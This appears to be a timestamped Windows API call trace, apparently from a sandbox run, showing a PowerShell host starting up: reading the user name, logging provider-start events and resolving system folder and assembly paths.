	[0825.012] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b836b20, nSize=0x1ad608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad608) returned 0x1
	[0825.012] CoTaskMemFree (pv=0x1b836b20) 
	[0825.012] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0825.012] GetUserNameW (in: lpBuffer=0x356120, pcbBuffer=0x1ad648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad648) returned 1
	[0825.012] CoTaskMemFree (pv=0x356120) 
	[0825.013] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35a27a0*="Function", lpRawData=0x35a2530) returned 1
	[0825.017] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0825.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0825.017] CoTaskMemFree (pv=0x3cbb20) 
	[0828.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0828.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0828.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0828.096] CoTaskMemAlloc (cb=0x804) returned 0x1b836b20
	[0828.096] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b836b20, nSize=0x1ad608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad608) returned 0x1
	[0828.096] CoTaskMemFree (pv=0x1b836b20) 
	[0828.097] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0828.097] GetUserNameW (in: lpBuffer=0x356120, pcbBuffer=0x1ad648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad648) returned 1
	[0828.097] CoTaskMemFree (pv=0x356120) 
	[0828.097] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35c4fc8*="Registry", lpRawData=0x35c4d58) returned 1
	[0828.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0828.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0828.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0828.203] CoTaskMemAlloc (cb=0x804) returned 0x1b836b20
	[0828.203] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b836b20, nSize=0x1ad608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad608) returned 0x1
	[0828.204] CoTaskMemFree (pv=0x1b836b20) 
	[0828.204] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0828.204] GetUserNameW (in: lpBuffer=0x356120, pcbBuffer=0x1ad648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad648) returned 1
	[0828.204] CoTaskMemFree (pv=0x356120) 
	[0828.205] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35ca3e0*="Variable", lpRawData=0x35ca170) returned 1
	[0828.208] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0828.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0828.208] CoTaskMemFree (pv=0x3cbb20) 
	[0828.211] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0828.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0828.211] CoTaskMemFree (pv=0x3cbb20) 
	[0828.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1aceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0828.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0828.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0828.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ace00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0840.364] CoTaskMemAlloc (cb=0x804) returned 0x1b836b20
	[0840.364] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b836b20, nSize=0x1ad608 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad608) returned 0x1
	[0840.364] CoTaskMemFree (pv=0x1b836b20) 
	[0840.364] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0840.364] GetUserNameW (in: lpBuffer=0x356120, pcbBuffer=0x1ad648 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad648) returned 1
	[0840.365] CoTaskMemFree (pv=0x356120) 
	[0840.378] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x35de238*="Certificate", lpRawData=0x35ddfc8) returned 1
	[0841.547] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0841.547] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0841.547] CoTaskMemFree (pv=0x3cbb20) 
	[0841.553] GetLogicalDrives () returned 0x4
	[0841.553] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1ad290, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0841.553] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0841.554] CoTaskMemAlloc (cb=0x20e) returned 0x348490
	[0841.554] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x348490 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0841.555] CoTaskMemFree (pv=0x348490) 
	[0841.556] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0841.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0841.557] CoTaskMemFree (pv=0x3cbb20) 
	[0841.557] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0841.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0841.557] CoTaskMemFree (pv=0x3cbb20) 
	[0841.576] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0841.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0841.576] CoTaskMemFree (pv=0x3cbb20) 
	[0843.921] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0843.921] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0843.921] CoTaskMemFree (pv=0x3cbb20) 
	[0843.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0843.922] SetErrorMode (uMode=0x1) returned 0x1
	[0843.922] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad250 | out: lpFileInformation=0x1ad250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.913] SetErrorMode (uMode=0x1) returned 0x1
	[0845.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1acff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.913] SetErrorMode (uMode=0x1) returned 0x1
	[0845.914] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad250 | out: lpFileInformation=0x1ad250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.914] SetErrorMode (uMode=0x1) returned 0x1
	[0845.914] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0845.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0845.914] CoTaskMemFree (pv=0x3cbb20) 
	[0845.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.917] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad000, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0845.917] SetErrorMode (uMode=0x1) returned 0x1
	[0845.917] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad210 | out: lpFileInformation=0x1ad210*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0845.918] SetErrorMode (uMode=0x1) returned 0x1
	[0845.918] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad000, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0845.918] SetErrorMode (uMode=0x1) returned 0x1
	[0845.918] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x1ad210 | out: lpFileInformation=0x1ad210*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0845.918] SetErrorMode (uMode=0x1) returned 0x1
	[0845.918] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1ad010, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0845.918] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1acf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0845.918] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ad000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.919] SetErrorMode (uMode=0x1) returned 0x1
	[0845.919] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ad210 | out: lpFileInformation=0x1ad210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0845.919] SetErrorMode (uMode=0x1) returned 0x1
	[0845.919] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ad000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.919] SetErrorMode (uMode=0x1) returned 0x1
	[0845.919] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ad210 | out: lpFileInformation=0x1ad210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0845.919] SetErrorMode (uMode=0x1) returned 0x1
	[0845.919] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ad010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1acf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.920] SetErrorMode (uMode=0x1) returned 0x1
	[0845.920] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad210 | out: lpFileInformation=0x1ad210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.920] SetErrorMode (uMode=0x1) returned 0x1
	[0845.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.920] SetErrorMode (uMode=0x1) returned 0x1
	[0845.920] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad210 | out: lpFileInformation=0x1ad210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.920] SetErrorMode (uMode=0x1) returned 0x1
	[0845.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1acf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.921] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ad040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.921] SetErrorMode (uMode=0x1) returned 0x1
	[0845.921] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ad250 | out: lpFileInformation=0x1ad250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0845.921] SetErrorMode (uMode=0x1) returned 0x1
	[0845.921] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ad040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.921] SetErrorMode (uMode=0x1) returned 0x1
	[0845.921] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1ad250 | out: lpFileInformation=0x1ad250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0845.922] SetErrorMode (uMode=0x1) returned 0x1
	[0845.922] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1ad050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1acf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0845.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.922] SetErrorMode (uMode=0x1) returned 0x1
	[0845.922] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad250 | out: lpFileInformation=0x1ad250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.922] SetErrorMode (uMode=0x1) returned 0x1
	[0845.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.923] SetErrorMode (uMode=0x1) returned 0x1
	[0845.924] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad250 | out: lpFileInformation=0x1ad250*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.924] SetErrorMode (uMode=0x1) returned 0x1
	[0845.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1acf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ad2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0845.927] SetErrorMode (uMode=0x1) returned 0x1
	[0845.927] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1ad510 | out: lpFileInformation=0x1ad510*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0845.927] SetErrorMode (uMode=0x1) returned 0x1
	[0845.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0845.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0845.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0845.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0845.956] CoTaskMemAlloc (cb=0x804) returned 0x1b836b20
	[0845.956] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b836b20, nSize=0x1ad878 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad878) returned 0x1
	[0847.232] CoTaskMemFree (pv=0x1b836b20) 
	[0847.232] CoTaskMemAlloc (cb=0x204) returned 0x356120
	[0847.232] GetUserNameW (in: lpBuffer=0x356120, pcbBuffer=0x1ad8b8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad8b8) returned 1
	[0847.232] CoTaskMemFree (pv=0x356120) 
	[0847.233] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3616f20*="Available", lpRawData=0x3616cb0) returned 1
	[0847.711] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0847.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.711] CoTaskMemFree (pv=0x3cbb20) 
	[0847.712] CoTaskMemAlloc (cb=0x104) returned 0x3cbb20
	[0847.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3cbb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.712] CoTaskMemFree (pv=0x3cbb20) 
	[0847.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
